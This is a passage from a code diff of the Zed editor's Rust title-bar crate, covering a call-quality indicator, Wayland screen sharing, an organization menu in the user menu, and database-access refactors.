IconButton::new("call-quality", signal_icon) + .icon_size(IconSize::Small) + .when_some(signal_color, |button, color| button.icon_color(color)) + .tooltip(move |_window, cx| { + let quality_label = quality_label.clone(); + let latency = format_stat(stats.latency_ms, |v| format!("{:.0}ms", v)); + let jitter = format_stat(stats.jitter_ms, |v| format!("{:.0}ms", v)); + let packet_loss = format_stat(stats.packet_loss_pct, |v| format!("{:.1}%", v)); + let input_lag = + 
format_stat(stats.input_lag.map(|d| d.as_secs_f64() * 1000.0), |v| { + format!("{:.1}ms", v) + }); + + Tooltip::with_meta( + format!("Connection: {quality_label}"), + Some(&ShowCallStats), + format!( + "Latency: {latency} · Jitter: {jitter} · Loss: {packet_loss} · Input lag: {input_lag}", + ), + cx, + ) + }) + .on_click(move |_, window, cx| { + window.dispatch_action(Box::new(ShowCallStats), cx); + }) + .into_any_element(), + ); + if is_local && can_share_projects && !is_connecting_to_project { let is_sharing_disabled = channel.is_some_and(|channel| match channel.visibility { proto::ChannelVisibility::Public => project.visible_worktrees(cx).any(|worktree| { @@ -489,6 +550,11 @@ impl TitleBar { ); if can_use_microphone && screen_sharing_supported { + #[cfg(target_os = "linux")] + let is_wayland = gpui::guess_compositor() == "Wayland"; + #[cfg(not(target_os = "linux"))] + let is_wayland = false; + let trigger = IconButton::new("screen-share", IconName::Screen) .style(ButtonStyle::Subtle) .icon_size(IconSize::Small) @@ -505,28 +571,56 @@ impl TitleBar { .room() .is_some_and(|room| !room.read(cx).is_sharing_screen()); - window - .spawn(cx, async move |cx| { - let screen = if should_share { - cx.update(|_, cx| pick_default_screen(cx))?.await - } else { - Ok(None) - }; - cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?; + #[cfg(target_os = "linux")] + { + if is_wayland + && let Some(room) = ActiveCall::global(cx).read(cx).room().cloned() + { + let task = room.update(cx, |room, cx| { + if should_share { + room.share_screen_wayland(cx) + } else { + room.unshare_screen(true, cx) + .map(|()| Task::ready(Ok(()))) + .unwrap_or_else(|e| Task::ready(Err(e))) + } + }); + task.detach_and_prompt_err( + "Sharing Screen Failed", + window, + cx, + |e, _, _| Some(format!("{e:?}")), + ); + } + } + if !is_wayland { + window + .spawn(cx, async move |cx| { + let screen = if should_share { + cx.update(|_, cx| pick_default_screen(cx))?.await + } else { + Ok(None) + }; + 
cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?; - Result::<_, anyhow::Error>::Ok(()) - }) - .detach(); + Result::<_, anyhow::Error>::Ok(()) + }) + .detach(); + } }); - children.push( - SplitButton::new( - trigger.render(window, cx), - self.render_screen_list().into_any_element(), - ) - .style(SplitButtonStyle::Transparent) - .into_any_element(), - ); + if is_wayland { + children.push(trigger.into_any_element()); + } else { + children.push( + SplitButton::new( + trigger.render(window, cx), + self.render_screen_list().into_any_element(), + ) + .style(SplitButtonStyle::Transparent) + .into_any_element(), + ); + } } children.push(div().pr_2().into_any_element()); diff --git a/crates/title_bar/src/onboarding_banner.rs b/crates/title_bar/src/onboarding_banner.rs index ac3e80e179babc8ae9ee1c86c93c11f57cedb9b7..96400a91a0a26fdc6a4c1acb6387f27c3077e393 100644 --- a/crates/title_bar/src/onboarding_banner.rs +++ b/crates/title_bar/src/onboarding_banner.rs @@ -1,3 +1,7 @@ +// This module provides infrastructure for showing onboarding banners in the title bar. +// It's currently not in use but is kept for future feature announcements. 
+#![allow(dead_code)] + use gpui::{Action, Entity, Global, Render, SharedString}; use ui::{ButtonLike, Tooltip, prelude::*}; use util::ResultExt; @@ -44,7 +48,7 @@ impl OnboardingBanner { subtitle: subtitle.or(Some(SharedString::from("Introducing:"))), }, visible_when: None, - dismissed: get_dismissed(source), + dismissed: get_dismissed(source, cx), } } @@ -75,9 +79,9 @@ fn dismissed_at_key(source: &str) -> String { } } -fn get_dismissed(source: &str) -> bool { +fn get_dismissed(source: &str, cx: &App) -> bool { let dismissed_at = dismissed_at_key(source); - db::kvp::KEY_VALUE_STORE + db::kvp::KeyValueStore::global(cx) .read_kvp(&dismissed_at) .log_err() .is_some_and(|dismissed| dismissed.is_some()) @@ -85,28 +89,30 @@ fn get_dismissed(source: &str) -> bool { fn persist_dismissed(source: &str, cx: &mut App) { let dismissed_at = dismissed_at_key(source); - cx.spawn(async |_| { + let kvp = db::kvp::KeyValueStore::global(cx); + cx.spawn(async move |_| { let time = chrono::Utc::now().to_rfc3339(); - db::kvp::KEY_VALUE_STORE.write_kvp(dismissed_at, time).await + kvp.write_kvp(dismissed_at, time).await }) .detach_and_log_err(cx); } pub fn restore_banner(cx: &mut App) { - cx.defer(|cx| { - cx.global::() - .entity - .clone() - .update(cx, |this, cx| { + if let Some(banner_global) = cx.try_global::() { + let entity = banner_global.entity.clone(); + cx.defer(move |cx| { + entity.update(cx, |this, cx| { this.dismissed = false; cx.notify(); }); - }); + }); - let source = &cx.global::().entity.read(cx).source; - let dismissed_at = dismissed_at_key(source); - cx.spawn(async |_| db::kvp::KEY_VALUE_STORE.delete_kvp(dismissed_at).await) - .detach_and_log_err(cx); + let source = &cx.global::().entity.read(cx).source; + let dismissed_at = dismissed_at_key(source); + let kvp = db::kvp::KeyValueStore::global(cx); + cx.spawn(async move |_| kvp.delete_kvp(dismissed_at).await) + .detach_and_log_err(cx); + } } impl Render for OnboardingBanner { diff --git 
a/crates/title_bar/src/plan_chip.rs b/crates/title_bar/src/plan_chip.rs index edec0da2dea317bd122ece14d6afb90a31990c96..237e507ed8e4d1a5f63a7df116bf08fd69086bc2 100644 --- a/crates/title_bar/src/plan_chip.rs +++ b/crates/title_bar/src/plan_chip.rs @@ -33,6 +33,7 @@ impl RenderOnce for PlanChip { Plan::ZedFree => ("Free", Color::Default, free_chip_bg), Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg), Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg), + Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg), Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg), }; diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index f00a71a305e306ba9201e5a4976382012ae0059e..dfcd933dc20df9a6f6643402719f2ec1143cc7fe 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -14,6 +14,7 @@ pub use platform_title_bar::{ self, DraggedWindowTab, MergeAllWindows, MoveTabToNewWindow, PlatformTitleBar, ShowNextWindowTab, ShowPreviousWindowTab, }; +use project::linked_worktree_short_name; #[cfg(not(target_os = "macos"))] use crate::application_menu::{ @@ -24,19 +25,18 @@ use auto_update::AutoUpdateStatus; use call::ActiveCall; use client::{Client, UserStore, zed_urls}; use cloud_api_types::Plan; -use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt}; + use gpui::{ - Action, AnyElement, App, Context, Corner, Element, Empty, Entity, Focusable, - InteractiveElement, IntoElement, MouseButton, ParentElement, Render, - StatefulInteractiveElement, Styled, Subscription, WeakEntity, Window, actions, div, + Action, AnyElement, App, Context, Corner, Element, Entity, Focusable, InteractiveElement, + IntoElement, MouseButton, ParentElement, Render, StatefulInteractiveElement, Styled, + Subscription, WeakEntity, Window, actions, div, }; use onboarding_banner::OnboardingBanner; -use project::{ - DisableAiSettings, Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees, -}; +use 
project::{Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees}; use remote::RemoteConnectionOptions; use settings::Settings; use settings::WorktreeId; +use std::collections::HashSet; use std::sync::Arc; use theme::ActiveTheme; use title_bar_settings::TitleBarSettings; @@ -47,9 +47,9 @@ use ui::{ use update_version::UpdateVersion; use util::ResultExt; use workspace::{ - MultiWorkspace, ToggleWorkspaceSidebar, ToggleWorktreeSecurity, Workspace, - notifications::NotifyResultExt, + MultiWorkspace, ToggleWorktreeSecurity, Workspace, WorkspaceId, notifications::NotifyResultExt, }; + use zed_actions::OpenRemote; pub use onboarding_banner::restore_banner; @@ -82,7 +82,8 @@ pub fn init(cx: &mut App) { let Some(window) = window else { return; }; - let item = cx.new(|cx| TitleBar::new("title-bar", workspace, window, cx)); + let multi_workspace = workspace.multi_workspace().cloned(); + let item = cx.new(|cx| TitleBar::new("title-bar", workspace, multi_workspace, window, cx)); workspace.set_titlebar_item(item.into(), window, cx); workspace.register_action(|workspace, _: &SimulateUpdateAvailable, _window, cx| { @@ -151,29 +152,65 @@ pub struct TitleBar { user_store: Entity, client: Arc, workspace: WeakEntity, + multi_workspace: Option>, application_menu: Option>, _subscriptions: Vec, - banner: Entity, + banner: Option>, update_version: Entity, screen_share_popover_handle: PopoverMenuHandle, + _diagnostics_subscription: Option, } impl Render for TitleBar { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + if self.multi_workspace.is_none() { + if let Some(mw) = self + .workspace + .upgrade() + .and_then(|ws| ws.read(cx).multi_workspace().cloned()) + { + self.multi_workspace = Some(mw.clone()); + self.platform_titlebar.update(cx, |titlebar, _cx| { + titlebar.set_multi_workspace(mw); + }); + } + } + let title_bar_settings = *TitleBarSettings::get_global(cx); + let button_layout = title_bar_settings.button_layout; let show_menus = 
show_menus(cx); let mut children = Vec::new(); + let mut project_name = None; + let mut repository = None; + let mut linked_worktree_name = None; + if let Some(worktree) = self.effective_active_worktree(cx) { + repository = self.get_repository_for_worktree(&worktree, cx); + let worktree = worktree.read(cx); + project_name = worktree + .root_name() + .file_name() + .map(|name| SharedString::from(name.to_string())); + linked_worktree_name = repository.as_ref().and_then(|repo| { + let repo = repo.read(cx); + linked_worktree_short_name( + repo.original_repo_abs_path.as_ref(), + repo.work_directory_abs_path.as_ref(), + ) + .filter(|name| Some(name) != project_name.as_ref()) + }); + } + children.push( h_flex() + .h_full() .gap_0p5() .map(|title_bar| { let mut render_project_items = title_bar_settings.show_branch_name || title_bar_settings.show_project_items; title_bar - .children(self.render_workspace_sidebar_toggle(window, cx)) .when_some( self.application_menu.clone().filter(|_| !show_menus), |title_bar, menu| { @@ -188,11 +225,18 @@ impl Render for TitleBar { .when(title_bar_settings.show_project_items, |title_bar| { title_bar .children(self.render_project_host(cx)) - .child(self.render_project_name(cx)) - }) - .when(title_bar_settings.show_branch_name, |title_bar| { - title_bar.children(self.render_project_branch(cx)) + .child(self.render_project_name(project_name, window, cx)) }) + .when_some( + repository.filter(|_| title_bar_settings.show_branch_name), + |title_bar, repository| { + title_bar.children(self.render_project_branch( + repository, + linked_worktree_name, + cx, + )) + }, + ) }) }) .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) @@ -202,7 +246,9 @@ impl Render for TitleBar { children.push(self.render_collaborator_list(window, cx).into_any_element()); if title_bar_settings.show_onboarding_banner { - children.push(self.banner.clone().into_any_element()) + if let Some(banner) = &self.banner { + 
children.push(banner.clone().into_any_element()) + } } let status = self.client.status(); @@ -229,7 +275,6 @@ impl Render for TitleBar { user.is_none() && TitleBarSettings::get_global(cx).show_sign_in, |this| this.child(self.render_sign_in_button(cx)), ) - .child(self.render_organization_menu_button(cx)) .when(TitleBarSettings::get_global(cx).show_user_menu, |this| { this.child(self.render_user_menu_button(cx)) }) @@ -238,6 +283,7 @@ impl Render for TitleBar { if show_menus { self.platform_titlebar.update(cx, |this, _| { + this.set_button_layout(button_layout); this.set_children( self.application_menu .clone() @@ -265,6 +311,7 @@ impl Render for TitleBar { .into_any_element() } else { self.platform_titlebar.update(cx, |this, _| { + this.set_button_layout(button_layout); this.set_children(children); }); self.platform_titlebar.clone().into_any_element() @@ -276,6 +323,7 @@ impl TitleBar { pub fn new( id: impl Into, workspace: &Workspace, + multi_workspace: Option>, window: &mut Window, cx: &mut Context, ) -> Self { @@ -332,82 +380,40 @@ impl TitleBar { }), ); subscriptions.push(cx.observe(&user_store, |_a, _, cx| cx.notify())); + subscriptions.push(cx.observe_button_layout_changed(window, |_, _, cx| cx.notify())); if let Some(trusted_worktrees) = TrustedWorktrees::try_get_global(cx) { subscriptions.push(cx.subscribe(&trusted_worktrees, |_, _, _, cx| { cx.notify(); })); } - let banner = cx.new(|cx| { - OnboardingBanner::new( - "ACP Claude Code Onboarding", - IconName::AiClaude, - "Claude Agent", - Some("Introducing:".into()), - zed_actions::agent::OpenClaudeAgentOnboardingModal.boxed_clone(), - cx, - ) - // When updating this to a non-AI feature release, remove this line. - .visible_when(|cx| !project::DisableAiSettings::get_global(cx).disable_ai) - }); - let update_version = cx.new(|cx| UpdateVersion::new(cx)); - let platform_titlebar = cx.new(|cx| PlatformTitleBar::new(id, cx)); - - // Set up observer to sync sidebar state from MultiWorkspace to PlatformTitleBar. 
- { - let platform_titlebar = platform_titlebar.clone(); - let window_handle = window.window_handle(); - cx.spawn(async move |this: WeakEntity, cx| { - let Some(multi_workspace_handle) = window_handle.downcast::() - else { - return; - }; - - let _ = cx.update(|cx| { - let Ok(multi_workspace) = multi_workspace_handle.entity(cx) else { - return; - }; - - let is_open = multi_workspace.read(cx).is_sidebar_open(); - let has_notifications = multi_workspace.read(cx).sidebar_has_notifications(cx); - platform_titlebar.update(cx, |titlebar, cx| { - titlebar.set_workspace_sidebar_open(is_open, cx); - titlebar.set_sidebar_has_notifications(has_notifications, cx); - }); - - let platform_titlebar = platform_titlebar.clone(); - let subscription = cx.observe(&multi_workspace, move |mw, cx| { - let is_open = mw.read(cx).is_sidebar_open(); - let has_notifications = mw.read(cx).sidebar_has_notifications(cx); - platform_titlebar.update(cx, |titlebar, cx| { - titlebar.set_workspace_sidebar_open(is_open, cx); - titlebar.set_sidebar_has_notifications(has_notifications, cx); - }); - }); - - if let Some(this) = this.upgrade() { - this.update(cx, |this, _| { - this._subscriptions.push(subscription); - }); - } - }); - }) - .detach(); - } + let platform_titlebar = cx.new(|cx| { + let mut titlebar = PlatformTitleBar::new(id, cx); + if let Some(mw) = multi_workspace.clone() { + titlebar = titlebar.with_multi_workspace(mw); + } + titlebar + }); - Self { + let mut this = Self { platform_titlebar, application_menu, workspace: workspace.weak_handle(), + multi_workspace, project, user_store, client, _subscriptions: subscriptions, - banner, + banner: None, update_version, screen_share_popover_handle: PopoverMenuHandle::default(), - } + _diagnostics_subscription: None, + }; + + this.observe_diagnostics(cx); + + this } fn worktree_count(&self, cx: &App) -> usize { @@ -481,14 +487,15 @@ impl TitleBar { let git_store = project.git_store().read(cx); let worktree_path = worktree.read(cx).abs_path(); - for 
repo in git_store.repositories().values() { - let repo_path = &repo.read(cx).work_directory_abs_path; - if worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref()) { - return Some(repo.clone()); - } - } - - None + git_store + .repositories() + .values() + .filter(|repo| { + let repo_path = &repo.read(cx).work_directory_abs_path; + worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref()) + }) + .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len()) + .cloned() } fn render_remote_project_connection(&self, cx: &mut Context) -> Option { @@ -604,10 +611,11 @@ impl TitleBar { .style(ButtonStyle::Tinted(TintColor::Warning)) .label_size(LabelSize::Small) .color(Color::Warning) - .icon(IconName::Warning) - .icon_color(Color::Warning) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Warning) + .size(IconSize::Small) + .color(Color::Warning), + ) .tooltip(|_, cx| { Tooltip::with_meta( "You're in Restricted Mode", @@ -683,49 +691,14 @@ impl TitleBar { ) } - fn render_workspace_sidebar_toggle( + fn render_project_name( &self, - _window: &mut Window, + name: Option, + _: &mut Window, cx: &mut Context, - ) -> Option { - if !cx.has_flag::() || DisableAiSettings::get_global(cx).disable_ai { - return None; - } - - let is_sidebar_open = self.platform_titlebar.read(cx).is_workspace_sidebar_open(); - - if is_sidebar_open { - return None; - } - - let has_notifications = self.platform_titlebar.read(cx).sidebar_has_notifications(); - - Some( - IconButton::new("toggle-workspace-sidebar", IconName::WorkspaceNavClosed) - .icon_size(IconSize::Small) - .when(has_notifications, |button| { - button - .indicator(Indicator::dot().color(Color::Accent)) - .indicator_border_color(Some(cx.theme().colors().title_bar_background)) - }) - .tooltip(move |_, cx| { - Tooltip::for_action("Open Workspace Sidebar", &ToggleWorkspaceSidebar, cx) - }) - .on_click(|_, window, cx| { - 
window.dispatch_action(ToggleWorkspaceSidebar.boxed_clone(), cx); - }) - .into_any_element(), - ) - } - - pub fn render_project_name(&self, cx: &mut Context) -> impl IntoElement { + ) -> impl IntoElement { let workspace = self.workspace.clone(); - let name = self.effective_active_worktree(cx).map(|worktree| { - let worktree = worktree.read(cx); - SharedString::from(worktree.root_name().as_unix_str().to_string()) - }); - let is_project_selected = name.is_some(); let display_name = if let Some(ref name) = name { @@ -734,15 +707,49 @@ impl TitleBar { "Open Recent Project".to_string() }; + let is_sidebar_open = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| mw.read(cx).sidebar_open()) + .unwrap_or(false) + && PlatformTitleBar::is_multi_workspace_enabled(cx); + + let is_threads_list_view_active = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| mw.read(cx).is_threads_list_view_active(cx)) + .unwrap_or(false); + + if is_sidebar_open && is_threads_list_view_active { + return self + .render_recent_projects_popover(display_name, is_project_selected, cx) + .into_any_element(); + } + let focus_handle = workspace .upgrade() .map(|w| w.read(cx).focus_handle(cx)) .unwrap_or_else(|| cx.focus_handle()); + let sibling_workspace_ids: HashSet = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| { + mw.read(cx) + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect() + }) + .unwrap_or_default(); + PopoverMenu::new("recent-projects-menu") .menu(move |window, cx| { Some(recent_projects::RecentProjects::popover( workspace.clone(), + sibling_workspace_ids.clone(), false, focus_handle.clone(), window, @@ -753,9 +760,11 @@ impl TitleBar { Button::new("project_name_trigger", display_name) .label_size(LabelSize::Small) .when(self.worktree_count(cx) > 1, |this| { - this.icon(IconName::ChevronDown) - .icon_color(Color::Muted) - .icon_size(IconSize::XSmall) + this.end_icon( + 
Icon::new(IconName::ChevronDown) + .size(IconSize::XSmall) + .color(Color::Muted), + ) }) .selected_style(ButtonStyle::Tinted(TintColor::Accent)) .when(!is_project_selected, |s| s.color(Color::Muted)), @@ -773,13 +782,78 @@ impl TitleBar { .into_any_element() } - pub fn render_project_branch(&self, cx: &mut Context) -> Option { - let effective_worktree = self.effective_active_worktree(cx)?; - let repository = self.get_repository_for_worktree(&effective_worktree, cx)?; + fn render_recent_projects_popover( + &self, + display_name: String, + is_project_selected: bool, + cx: &mut Context, + ) -> impl IntoElement { + let workspace = self.workspace.clone(); + + let focus_handle = workspace + .upgrade() + .map(|w| w.read(cx).focus_handle(cx)) + .unwrap_or_else(|| cx.focus_handle()); + + let sibling_workspace_ids: HashSet = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| { + mw.read(cx) + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect() + }) + .unwrap_or_default(); + + PopoverMenu::new("sidebar-title-recent-projects-menu") + .menu(move |window, cx| { + Some(recent_projects::RecentProjects::popover( + workspace.clone(), + sibling_workspace_ids.clone(), + false, + focus_handle.clone(), + window, + cx, + )) + }) + .trigger_with_tooltip( + Button::new("project_name_trigger", display_name) + .label_size(LabelSize::Small) + .when(self.worktree_count(cx) > 1, |this| { + this.end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::XSmall) + .color(Color::Muted), + ) + }) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .when(!is_project_selected, |s| s.color(Color::Muted)), + move |_window, cx| { + Tooltip::for_action( + "Recent Projects", + &zed_actions::OpenRecent { + create_new_window: false, + }, + cx, + ) + }, + ) + .anchor(gpui::Corner::TopLeft) + } + + fn render_project_branch( + &self, + repository: Entity, + linked_worktree_name: Option, + cx: &mut Context, + ) -> Option { let workspace = 
self.workspace.upgrade()?; let (branch_name, icon_info) = { let repo = repository.read(cx); + let branch_name = repo .branch .as_ref() @@ -812,8 +886,8 @@ impl TitleBar { (branch_name, icon_info) }; + let branch_name = branch_name?; let settings = TitleBarSettings::get_global(cx); - let effective_repository = Some(repository); Some( @@ -829,23 +903,42 @@ impl TitleBar { )) }) .trigger_with_tooltip( - Button::new("project_branch_trigger", branch_name?) + ButtonLike::new("project_branch_trigger") .selected_style(ButtonStyle::Tinted(TintColor::Accent)) - .label_size(LabelSize::Small) - .color(Color::Muted) - .when(settings.show_branch_icon, |branch_button| { - let (icon, icon_color) = icon_info; - branch_button - .icon(icon) - .icon_position(IconPosition::Start) - .icon_color(icon_color) - .icon_size(IconSize::Indicator) - }), + .child( + h_flex() + .gap_0p5() + .when(settings.show_branch_icon, |this| { + let (icon, icon_color) = icon_info; + this.child( + Icon::new(icon).size(IconSize::XSmall).color(icon_color), + ) + }) + .when_some(linked_worktree_name.as_ref(), |this, worktree_name| { + this.child( + Label::new(worktree_name) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .child( + Label::new("/").size(LabelSize::Small).color( + Color::Custom( + cx.theme().colors().text_muted.opacity(0.4), + ), + ), + ) + }) + .child( + Label::new(branch_name) + .size(LabelSize::Small) + .color(Color::Muted), + ), + ), move |_window, cx| { Tooltip::with_meta( - "Recent Branches", + "Git Switcher", Some(&zed_actions::git::Branch), - "Local branches only", + "Worktrees, Branches, and Stashes", cx, ) }, @@ -872,9 +965,23 @@ impl TitleBar { } fn active_call_changed(&mut self, cx: &mut Context) { + self.observe_diagnostics(cx); cx.notify(); } + fn observe_diagnostics(&mut self, cx: &mut Context) { + let diagnostics = ActiveCall::global(cx) + .read(cx) + .room() + .and_then(|room| room.read(cx).diagnostics().cloned()); + + if let Some(diagnostics) = diagnostics { + 
self._diagnostics_subscription = Some(cx.observe(&diagnostics, |_, _, cx| cx.notify())); + } else { + self._diagnostics_subscription = None; + } + } + fn share_project(&mut self, cx: &mut Context) { let active_call = ActiveCall::global(cx); let project = self.project.clone(); @@ -958,110 +1065,80 @@ impl TitleBar { }) } - pub fn render_organization_menu_button(&mut self, cx: &mut Context) -> AnyElement { - let Some(organization) = self.user_store.read(cx).current_organization() else { - return Empty.into_any_element(); - }; - - PopoverMenu::new("organization-menu") - .anchor(Corner::TopRight) - .menu({ - let user_store = self.user_store.clone(); - move |window, cx| { - ContextMenu::build(window, cx, |mut menu, _window, cx| { - menu = menu.header("Organizations").separator(); - - let current_organization = user_store.read(cx).current_organization(); - - for organization in user_store.read(cx).organizations() { - let organization = organization.clone(); - let plan = user_store.read(cx).plan_for_organization(&organization.id); - - let is_current = - current_organization - .as_ref() - .is_some_and(|current_organization| { - current_organization.id == organization.id - }); - - menu = menu.custom_entry( - { - let organization = organization.clone(); - move |_window, _cx| { - h_flex() - .w_full() - .gap_1() - .child( - div() - .flex_none() - .when(!is_current, |parent| parent.invisible()) - .child(Icon::new(IconName::Check)), - ) - .child( - h_flex() - .w_full() - .gap_3() - .justify_between() - .child(Label::new(&organization.name)) - .child(PlanChip::new( - plan.unwrap_or(Plan::ZedFree), - )), - ) - .into_any_element() - } - }, - { - let user_store = user_store.clone(); - let organization = organization.clone(); - move |_window, cx| { - user_store.update(cx, |user_store, _cx| { - user_store - .set_current_organization(organization.clone()); - }); - } - }, - ); - } - - menu - }) - .into() - } - }) - .trigger_with_tooltip( - Button::new("organization-menu", 
&organization.name) - .selected_style(ButtonStyle::Tinted(TintColor::Accent)) - .label_size(LabelSize::Small), - Tooltip::text("Toggle Organization Menu"), - ) - .anchor(gpui::Corner::TopRight) - .into_any_element() - } - pub fn render_user_menu_button(&mut self, cx: &mut Context) -> impl Element { - let show_update_badge = self.update_version.read(cx).show_update_in_menu_bar(); + let show_update_button = self.update_version.read(cx).show_update_in_menu_bar(); - let user_store = self.user_store.read(cx); - let user = user_store.current_user(); + let user_store = self.user_store.clone(); + let user_store_read = user_store.read(cx); + let user = user_store_read.current_user(); let user_avatar = user.as_ref().map(|u| u.avatar_uri.clone()); let user_login = user.as_ref().map(|u| u.github_login.clone()); let is_signed_in = user.is_some(); - let has_subscription_period = user_store.subscription_period().is_some(); - let plan = user_store.plan().filter(|_| { + let has_subscription_period = user_store_read.subscription_period().is_some(); + let plan = user_store_read.plan().filter(|_| { // Since the user might be on the legacy free plan we filter based on whether we have a subscription period. 
has_subscription_period }); + let has_organization = user_store_read.current_organization().is_some(); + + let current_organization = user_store_read.current_organization(); + let business_organization = current_organization + .as_ref() + .filter(|organization| !organization.is_personal); + let organizations: Vec<_> = user_store_read + .organizations() + .iter() + .map(|org| { + let plan = user_store_read.plan_for_organization(&org.id); + (org.clone(), plan) + }) + .collect(); + + let show_user_picture = TitleBarSettings::get_global(cx).show_user_picture; + + let trigger = if is_signed_in && show_user_picture { + let avatar = user_avatar.map(|avatar| Avatar::new(avatar)).map(|avatar| { + if show_update_button { + avatar.indicator( + div() + .absolute() + .bottom_0() + .right_0() + .child(Indicator::dot().color(Color::Accent)), + ) + } else { + avatar + } + }); + + ButtonLike::new("user-menu").child( + h_flex() + .when_some(business_organization, |this, organization| { + this.gap_2() + .child(Label::new(&organization.name).size(LabelSize::Small)) + }) + .children(avatar), + ) + } else { + ButtonLike::new("user-menu") + .child(Icon::new(IconName::ChevronDown).size(IconSize::Small)) + }; + PopoverMenu::new("user-menu") - .anchor(Corner::TopRight) + .trigger(trigger) .menu(move |window, cx| { - ContextMenu::build(window, cx, |menu, _, _cx| { - let user_login = user_login.clone(); + let user_login = user_login.clone(); + let current_organization = current_organization.clone(); + let organizations = organizations.clone(); + let user_store = user_store.clone(); + ContextMenu::build(window, cx, |menu, _, _cx| { menu.when(is_signed_in, |this| { + let user_login = user_login.clone(); this.custom_entry( move |_window, _cx| { let user_login = user_login.clone().unwrap_or_default(); @@ -1079,7 +1156,7 @@ impl TitleBar { ) .separator() }) - .when(show_update_badge, |this| { + .when(show_update_button, |this| { this.custom_entry( move |_window, _cx| { h_flex() @@ -1100,6 +1177,58 
@@ impl TitleBar { ) .separator() }) + .when(has_organization, |this| { + let mut this = this.header("Organization"); + + for (organization, plan) in &organizations { + let organization = organization.clone(); + let plan = *plan; + + let is_current = + current_organization + .as_ref() + .is_some_and(|current_organization| { + current_organization.id == organization.id + }); + + this = this.custom_entry( + { + let organization = organization.clone(); + move |_window, _cx| { + h_flex() + .w_full() + .gap_4() + .justify_between() + .child( + h_flex() + .gap_1() + .child(Label::new(&organization.name)) + .when(is_current, |this| { + this.child( + Icon::new(IconName::Check) + .color(Color::Accent), + ) + }), + ) + .child(PlanChip::new(plan.unwrap_or(Plan::ZedFree))) + .into_any_element() + } + }, + { + let user_store = user_store.clone(); + let organization = organization.clone(); + move |_window, cx| { + user_store.update(cx, |user_store, cx| { + user_store + .set_current_organization(organization.clone(), cx); + }); + } + }, + ); + } + + this.separator() + }) .action("Settings", zed_actions::OpenSettings.boxed_clone()) .action("Keymap", Box::new(zed_actions::OpenKeymap)) .action( @@ -1121,37 +1250,6 @@ impl TitleBar { }) .into() }) - .map(|this| { - if is_signed_in && TitleBarSettings::get_global(cx).show_user_picture { - let avatar = - user_avatar - .clone() - .map(|avatar| Avatar::new(avatar)) - .map(|avatar| { - if show_update_badge { - avatar.indicator( - div() - .absolute() - .bottom_0() - .right_0() - .child(Indicator::dot().color(Color::Accent)), - ) - } else { - avatar - } - }); - this.trigger_with_tooltip( - ButtonLike::new("user-menu").children(avatar), - Tooltip::text("Toggle User Menu"), - ) - } else { - this.trigger_with_tooltip( - IconButton::new("user-menu", IconName::ChevronDown) - .icon_size(IconSize::Small), - Tooltip::text("Toggle User Menu"), - ) - } - }) - .anchor(gpui::Corner::TopRight) + .anchor(Corner::TopRight) } } diff --git 
a/crates/title_bar/src/title_bar_settings.rs b/crates/title_bar/src/title_bar_settings.rs index 155b7b7bc797567927a70b12c677372cb92c9453..61f951ca305d1a0bb53100b883a5e77409adb54f 100644 --- a/crates/title_bar/src/title_bar_settings.rs +++ b/crates/title_bar/src/title_bar_settings.rs @@ -1,3 +1,4 @@ +use gpui::WindowButtonLayout; use settings::{RegisterSetting, Settings, SettingsContent}; #[derive(Copy, Clone, Debug, RegisterSetting)] @@ -10,6 +11,7 @@ pub struct TitleBarSettings { pub show_sign_in: bool, pub show_user_menu: bool, pub show_menus: bool, + pub button_layout: Option, } impl Settings for TitleBarSettings { @@ -24,6 +26,7 @@ impl Settings for TitleBarSettings { show_sign_in: content.show_sign_in.unwrap(), show_user_menu: content.show_user_menu.unwrap(), show_menus: content.show_menus.unwrap(), + button_layout: content.button_layout.unwrap_or_default().into_layout(), } } } diff --git a/crates/toolchain_selector/src/active_toolchain.rs b/crates/toolchain_selector/src/active_toolchain.rs index 36af60e0f792f5146b9b573bb6a060a8461fe117..a9218564b5567d86f097781b224ac0658a0d5221 100644 --- a/crates/toolchain_selector/src/active_toolchain.rs +++ b/crates/toolchain_selector/src/active_toolchain.rs @@ -117,7 +117,7 @@ impl ActiveToolchain { cx: &mut Context, ) { let editor = editor.read(cx); - if let Some((_, buffer, _)) = editor.active_excerpt(cx) + if let Some(buffer) = editor.active_buffer(cx) && let Some(worktree_id) = buffer.read(cx).file().map(|file| file.worktree_id(cx)) { let subscription = cx.subscribe_in( @@ -202,15 +202,15 @@ impl ActiveToolchain { this.worktree_for_id(worktree_id, cx) .map(|worktree| worktree.read(cx).abs_path()) })?; - workspace::WORKSPACE_DB - .set_toolchain( - workspace_id, - worktree_root_path, - relative_path.clone(), - toolchain.clone(), - ) - .await - .ok()?; + let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx)).ok()?; + db.set_toolchain( + workspace_id, + worktree_root_path, + relative_path.clone(), + 
